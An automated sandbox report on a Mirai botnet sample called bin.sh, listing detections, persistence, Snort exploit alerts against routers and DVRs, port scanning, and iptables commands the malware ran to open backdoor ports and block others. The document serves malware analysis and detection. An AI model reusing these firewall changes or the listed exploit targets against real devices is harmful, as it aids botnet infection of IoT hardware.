Linux Analysis Report bin.sh

Overview

General Information

Sample Name: bin.sh
Analysis ID: 522924
MD5: eec5c6c219535fba3a0492ea8118b397
SHA1: 292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256: 12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
Infos:

Detection

Mirai
Score: 100
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Antivirus detection for dropped file
Sample tries to persist itself using System V runlevels
Opens /proc/net/* files useful for finding connected devices and routers
Sample tries to persist itself using /etc/profile
Connects to many ports of the same IP (likely port scanning)
Drops files in suspicious directories
Uses known network protocols on non-standard ports
Executes the "iptables" command to insert, remove and/or manipulate rules
Sample reads /proc/mounts (often used for finding a writable filesystem)
Terminates several processes with shell command 'killall'
Writes ELF files to disk
Yara signature match
Writes shell script files to disk
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Writes HTML files containing JavaScript to disk
Sample has stripped symbol table
Executes the "iptables" command used for managing IP filtering and manipulation
Executes the "modprobe" command used for loading kernel modules
Sample tries to set the executable flag
HTTP GET or POST without a user agent
Executes commands using a shell command-line interpreter

Classification

AV Detection:

barindex
Antivirus / Scanner detection for submitted sample
Source: bin.sh Avira: detected
Multi AV Scanner detection for submitted file
Source: bin.sh Metadefender: Detection: 54% Perma Link
Source: bin.sh ReversingLabs: Detection: 75%
Antivirus detection for dropped file
Source: /usr/networks Avira: detection malicious, Label: LINUX/Mirai.lldau

Spreading:

barindex
Opens /proc/net/* files useful for finding connected devices and routers
Source: /tmp/bin.sh (PID: 6815) Opens: /proc/net/route Jump to behavior
Source: /tmp/bin.sh (PID: 6815) Opens: /proc/net/route Jump to behavior

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:57282 -> 221.128.175.114:80
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 123.0.249.125:23 -> 192.168.2.20:55784
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 123.0.249.125:23 -> 192.168.2.20:55784
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 123.0.249.125:23 -> 192.168.2.20:55824
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 123.0.249.125:23 -> 192.168.2.20:55824
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 123.0.249.125:23 -> 192.168.2.20:56102
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 123.0.249.125:23 -> 192.168.2.20:56102
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 123.0.249.125:23 -> 192.168.2.20:56382
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 123.0.249.125:23 -> 192.168.2.20:56382
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:45982 -> 70.38.30.153:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:45982 -> 70.38.30.153:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:33058 -> 104.103.72.220:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:33058 -> 104.103.72.220:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.103.72.220:80 -> 192.168.2.20:33058
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:60718 -> 3.113.149.148:80
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:38508 -> 52.54.104.1:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:60718 -> 3.113.149.148:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:36526 -> 15.164.228.23:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:36526 -> 15.164.228.23:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:51860 -> 66.180.167.13:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:51860 -> 66.180.167.13:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:33706 -> 104.69.40.99:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:33706 -> 104.69.40.99:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.69.40.99:80 -> 192.168.2.20:33706
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:38172 -> 122.201.116.141:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:38172 -> 122.201.116.141:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:40608 -> 201.49.41.72:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:40608 -> 201.49.41.72:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:36730 -> 216.180.103.7:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:36730 -> 216.180.103.7:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:40506 -> 139.59.180.200:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:40506 -> 139.59.180.200:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:45410 -> 45.204.39.235:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:45410 -> 45.204.39.235:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:53170 -> 154.208.92.84:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:53170 -> 154.208.92.84:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:47632 -> 13.112.197.38:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:47632 -> 13.112.197.38:80
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:43200 -> 175.119.69.229:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:35942 -> 91.195.35.202:8080
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:35942 -> 91.195.35.202:8080
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:45572 -> 3.221.14.87:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:45572 -> 3.221.14.87:80
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:60680 -> 112.74.206.52:80
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 1.18.146.134 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 36.64.16.33 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 155.116.23.175 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 68.163.230.108 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 34.144.108.84 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 29.250.199.167 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 6.141.67.12 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 129.210.175.243 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 105.137.202.218 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 54.168.251.73 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 169.134.101.55 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 50.41.174.31 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 138.7.161.211 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 175.141.183.193 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 201.10.247.77 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 190.180.20.21 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 74.69.135.216 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 74.5.187.133 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 156.194.253.153 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 156.249.53.230 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 144.110.172.80 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 55.92.128.187 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 168.30.37.171 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 185.202.14.118 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 85.233.216.179 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 216.111.216.82 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 132.35.122.63 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 166.126.250.196 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 49.215.96.136 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 91.51.225.145 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 50.71.248.204 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 176.127.83.100 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 59.17.48.95 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 11.48.52.253 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 17.164.29.91 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 72.112.217.68 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 181.52.149.110 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 82.26.244.178 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 125.102.41.232 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 145.249.112.110 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 182.183.14.60 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 108.221.87.254 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 125.113.60.52 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 91.180.74.171 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 184.12.203.227 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 44.146.63.186 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 134.191.166.14 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 135.121.123.52 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 70.170.178.192 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 99.37.65.129 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 44.51.94.199 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 133.183.45.107 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 170.223.178.160 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 206.165.78.36 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 16.184.42.108 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 207.48.109.17 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 165.40.111.59 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 198.197.25.140 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 19.139.235.199 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 24.85.80.95 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 57.51.108.187 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 116.147.238.153 ports 1,2,3,5,7,37215
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 34674
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 34680
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 34684
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 34686
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 34688
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 34690
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 34692
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 34694
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 34696
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 35276
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 35278
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 35290
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 35292
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 35298
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 35300
Source: unknown Network traffic detected: HTTP traffic on port 32848 -> 8443
Executes the "iptables" command to insert, remove and/or manipulate rules
Source: /bin/sh (PID: 6827) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 47453 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 6857) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 47453 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 6863) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 47453 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 6897) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 47453 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 6913) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 47453 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 6935) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 47453 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 6948) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 47453 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 6973) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 47453 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 6992) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 6995) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 6998) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 7010) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 7067) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 7093) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 7122) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 7145) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 7163) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 7179) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 7200) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 7216) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 7230) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 7248) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 7261) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 7290) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 7316) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 7319) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 7327) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 7351) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 7378) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 4000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 7405) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 7426) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 7439) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT Jump to behavior
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.20:43926 -> 149.185.53.154:81
Source: global traffic TCP traffic: 192.168.2.20:40304 -> 155.61.123.253:81
Source: global traffic TCP traffic: 192.168.2.20:38230 -> 105.137.202.218:49152
Source: global traffic TCP traffic: 192.168.2.20:42082 -> 99.37.65.129:37215
Source: global traffic TCP traffic: 192.168.2.20:33594 -> 175.141.183.193:37215
Source: global traffic TCP traffic: 192.168.2.20:47968 -> 84.60.151.77:37215
Source: global traffic TCP traffic: 192.168.2.20:37470 -> 132.169.224.240:8443
Source: global traffic TCP traffic: 192.168.2.20:33484 -> 207.49.85.172:7574
Source: global traffic TCP traffic: 192.168.2.20:52462 -> 101.215.138.244:81
Source: global traffic TCP traffic: 192.168.2.20:46118 -> 141.139.161.123:8080
Source: global traffic TCP traffic: 192.168.2.20:48144 -> 190.180.20.21:49152
Source: global traffic TCP traffic: 192.168.2.20:44582 -> 97.152.141.58:8080
Source: global traffic TCP traffic: 192.168.2.20:34278 -> 132.35.122.63:49152
Source: global traffic TCP traffic: 192.168.2.20:42042 -> 206.66.211.183:7574
Source: global traffic TCP traffic: 192.168.2.20:47978 -> 5.69.78.55:8443
Source: global traffic TCP traffic: 192.168.2.20:40184 -> 138.58.82.192:8080
Source: global traffic TCP traffic: 192.168.2.20:41086 -> 50.41.174.31:49152
Source: global traffic TCP traffic: 192.168.2.20:52626 -> 85.233.216.179:49152
Source: global traffic TCP traffic: 192.168.2.20:52580 -> 193.176.243.123:8080
Source: global traffic TCP traffic: 192.168.2.20:50830 -> 59.17.48.95:37215
Source: global traffic TCP traffic: 192.168.2.20:56092 -> 176.127.83.100:49152
Source: global traffic TCP traffic: 192.168.2.20:39232 -> 34.144.108.84:49152
Source: global traffic TCP traffic: 192.168.2.20:45750 -> 133.183.45.107:49152
Source: global traffic TCP traffic: 192.168.2.20:48552 -> 43.163.194.108:8080
Source: global traffic TCP traffic: 192.168.2.20:35468 -> 55.92.128.187:52869
Source: global traffic TCP traffic: 192.168.2.20:48664 -> 73.227.59.34:7574
Source: global traffic TCP traffic: 192.168.2.20:52060 -> 201.10.247.77:52869
Source: global traffic TCP traffic: 192.168.2.20:53640 -> 1.86.24.162:5555
Source: global traffic TCP traffic: 192.168.2.20:50032 -> 117.145.177.145:8080
Source: global traffic TCP traffic: 192.168.2.20:60014 -> 124.193.58.88:7574
Source: global traffic TCP traffic: 192.168.2.20:53660 -> 7.175.103.180:5555
Source: global traffic TCP traffic: 192.168.2.20:51380 -> 103.98.158.56:81
Source: global traffic TCP traffic: 192.168.2.20:52262 -> 135.108.6.213:8080
Source: global traffic TCP traffic: 192.168.2.20:33314 -> 125.113.60.52:49152
Source: global traffic TCP traffic: 192.168.2.20:36276 -> 68.204.221.204:8443
Source: global traffic TCP traffic: 192.168.2.20:56462 -> 96.243.133.72:8080
Source: global traffic TCP traffic: 192.168.2.20:34528 -> 144.110.172.80:37215
Source: global traffic TCP traffic: 192.168.2.20:42294 -> 5.116.203.63:8080
Source: global traffic TCP traffic: 192.168.2.20:52428 -> 205.102.198.206:8080
Source: global traffic TCP traffic: 192.168.2.20:59822 -> 55.221.175.118:8443
Source: global traffic TCP traffic: 192.168.2.20:48250 -> 159.239.202.226:5555
Source: global traffic TCP traffic: 192.168.2.20:55236 -> 1.229.187.151:81
Source: global traffic TCP traffic: 192.168.2.20:35456 -> 185.69.187.126:7574
Source: global traffic TCP traffic: 192.168.2.20:42480 -> 189.6.77.233:81
Source: global traffic TCP traffic: 192.168.2.20:38974 -> 91.51.225.145:52869
Source: global traffic TCP traffic: 192.168.2.20:34920 -> 5.186.7.92:81
Source: global traffic TCP traffic: 192.168.2.20:41574 -> 31.116.224.12:8443
Source: global traffic TCP traffic: 192.168.2.20:52566 -> 49.215.96.136:49152
Source: global traffic TCP traffic: 192.168.2.20:54116 -> 50.71.248.204:37215
Source: global traffic TCP traffic: 192.168.2.20:40006 -> 117.41.103.207:8080
Source: global traffic TCP traffic: 192.168.2.20:34908 -> 57.51.108.187:37215
Source: global traffic TCP traffic: 192.168.2.20:52718 -> 151.214.152.36:81
Source: global traffic TCP traffic: 192.168.2.20:42630 -> 210.87.19.176:8080
Source: global traffic TCP traffic: 192.168.2.20:45752 -> 52.46.146.246:8080
Source: global traffic TCP traffic: 192.168.2.20:46532 -> 163.196.185.185:5555
Source: global traffic TCP traffic: 192.168.2.20:50614 -> 138.7.59.44:49152
Source: global traffic TCP traffic: 192.168.2.20:58240 -> 6.141.67.12:52869
Source: global traffic TCP traffic: 192.168.2.20:54036 -> 182.183.14.60:49152
Source: global traffic TCP traffic: 192.168.2.20:33700 -> 213.37.141.115:5555
Source: global traffic TCP traffic: 192.168.2.20:51012 -> 89.150.101.206:8080
Source: global traffic TCP traffic: 192.168.2.20:47588 -> 126.180.188.226:7574
Source: global traffic TCP traffic: 192.168.2.20:33908 -> 62.250.214.124:7574
Source: global traffic TCP traffic: 192.168.2.20:36634 -> 44.146.63.186:37215
Source: global traffic TCP traffic: 192.168.2.20:45226 -> 48.216.208.173:5555
Source: global traffic TCP traffic: 192.168.2.20:44272 -> 203.9.163.102:8443
Source: global traffic TCP traffic: 192.168.2.20:51112 -> 198.153.109.170:81
Source: global traffic TCP traffic: 192.168.2.20:48618 -> 203.250.146.230:8080
Source: global traffic TCP traffic: 192.168.2.20:38448 -> 135.121.123.52:49152
Source: global traffic TCP traffic: 192.168.2.20:37272 -> 170.223.178.160:37215
Source: global traffic TCP traffic: 192.168.2.20:47030 -> 16.184.42.108:52869
Source: global traffic TCP traffic: 192.168.2.20:60426 -> 181.52.149.110:52869
Source: global traffic TCP traffic: 192.168.2.20:49010 -> 159.14.216.23:8443
Source: global traffic TCP traffic: 192.168.2.20:34130 -> 74.5.187.133:52869
Source: global traffic TCP traffic: 192.168.2.20:38078 -> 58.217.250.57:8443
Source: global traffic TCP traffic: 192.168.2.20:37196 -> 105.159.210.4:8080
Source: global traffic TCP traffic: 192.168.2.20:39148 -> 71.13.95.149:8080
Source: global traffic TCP traffic: 192.168.2.20:43494 -> 36.64.16.33:49152
Source: global traffic TCP traffic: 192.168.2.20:37108 -> 47.253.230.173:5555
Source: global traffic TCP traffic: 192.168.2.20:49774 -> 166.126.250.196:49152
Source: global traffic TCP traffic: 192.168.2.20:34880 -> 142.135.25.78:8080
Source: global traffic TCP traffic: 192.168.2.20:48738 -> 168.30.37.171:49152
Source: global traffic TCP traffic: 192.168.2.20:51516 -> 173.102.232.221:5555
Source: global traffic TCP traffic: 192.168.2.20:37574 -> 111.122.147.188:8080
Source: global traffic TCP traffic: 192.168.2.20:55336 -> 64.136.60.132:8443
Source: global traffic TCP traffic: 192.168.2.20:42150 -> 31.184.54.69:8080
Source: global traffic TCP traffic: 192.168.2.20:60296 -> 111.107.14.55:8080
Source: global traffic TCP traffic: 192.168.2.20:51774 -> 24.85.80.95:49152
Source: global traffic TCP traffic: 192.168.2.20:43044 -> 129.210.175.243:37215
Source: global traffic TCP traffic: 192.168.2.20:36094 -> 36.238.254.86:8080
Source: global traffic TCP traffic: 192.168.2.20:57624 -> 201.13.139.241:8080
Source: global traffic TCP traffic: 192.168.2.20:60788 -> 96.13.10.218:8443
Source: global traffic TCP traffic: 192.168.2.20:34778 -> 103.69.161.106:7574
Source: global traffic TCP traffic: 192.168.2.20:42968 -> 117.47.195.144:8080
Source: global traffic TCP traffic: 192.168.2.20:48084 -> 134.191.166.14:49152
Source: global traffic TCP traffic: 192.168.2.20:53088 -> 148.213.108.240:7574
Source: global traffic TCP traffic: 192.168.2.20:52810 -> 125.221.235.0:8080
Source: global traffic TCP traffic: 192.168.2.20:39682 -> 206.165.78.36:37215
Source: global traffic TCP traffic: 192.168.2.20:56940 -> 116.142.239.53:8443
Source: global traffic TCP traffic: 192.168.2.20:60816 -> 11.248.186.95:8080
Source: global traffic TCP traffic: 192.168.2.20:60522 -> 62.174.49.184:8080
Source: global traffic TCP traffic: 192.168.2.20:45898 -> 153.220.50.14:81
Source: global traffic TCP traffic: 192.168.2.20:46192 -> 36.5.246.46:8080
Source: global traffic TCP traffic: 192.168.2.20:51322 -> 106.83.13.206:8080
Source: global traffic TCP traffic: 192.168.2.20:45798 -> 54.168.251.73:49152
Source: global traffic TCP traffic: 192.168.2.20:42262 -> 72.112.217.68:52869
Source: global traffic TCP traffic: 192.168.2.20:36422 -> 133.89.177.67:8080
Source: global traffic TCP traffic: 192.168.2.20:33958 -> 21.90.118.51:7574
Source: global traffic TCP traffic: 192.168.2.20:46510 -> 118.149.161.126:8443
Source: global traffic TCP traffic: 192.168.2.20:43272 -> 23.181.68.106:7574
Source: global traffic TCP traffic: 192.168.2.20:48896 -> 67.229.204.206:8080
Source: global traffic TCP traffic: 192.168.2.20:43214 -> 193.28.36.33:8080
Source: global traffic TCP traffic: 192.168.2.20:35272 -> 9.197.125.78:8080
Source: global traffic TCP traffic: 192.168.2.20:40834 -> 184.12.203.227:49152
Source: global traffic TCP traffic: 192.168.2.20:43326 -> 185.202.14.118:49152
Source: global traffic TCP traffic: 192.168.2.20:55580 -> 80.207.49.226:8080
Source: global traffic TCP traffic: 192.168.2.20:58080 -> 29.250.199.167:49152
Source: global traffic TCP traffic: 192.168.2.20:43824 -> 32.96.131.217:5555
Source: global traffic TCP traffic: 192.168.2.20:46416 -> 125.102.41.232:52869
Source: global traffic TCP traffic: 192.168.2.20:45010 -> 121.128.113.125:8080
Source: global traffic TCP traffic: 192.168.2.20:47312 -> 205.57.172.194:8080
Source: global traffic TCP traffic: 192.168.2.20:44042 -> 198.197.25.140:52869
Source: global traffic TCP traffic: 192.168.2.20:53916 -> 124.122.67.136:81
Source: global traffic TCP traffic: 192.168.2.20:34192 -> 207.48.109.17:37215
Source: global traffic TCP traffic: 192.168.2.20:45514 -> 33.170.253.17:8080
Source: global traffic TCP traffic: 192.168.2.20:34956 -> 44.51.94.199:52869
Source: global traffic TCP traffic: 192.168.2.20:33406 -> 82.26.244.178:49152
Source: global traffic TCP traffic: 192.168.2.20:48488 -> 215.176.205.161:8080
Source: global traffic TCP traffic: 192.168.2.20:37762 -> 138.65.229.49:8080
Source: global traffic TCP traffic: 192.168.2.20:35378 -> 56.164.61.40:8080
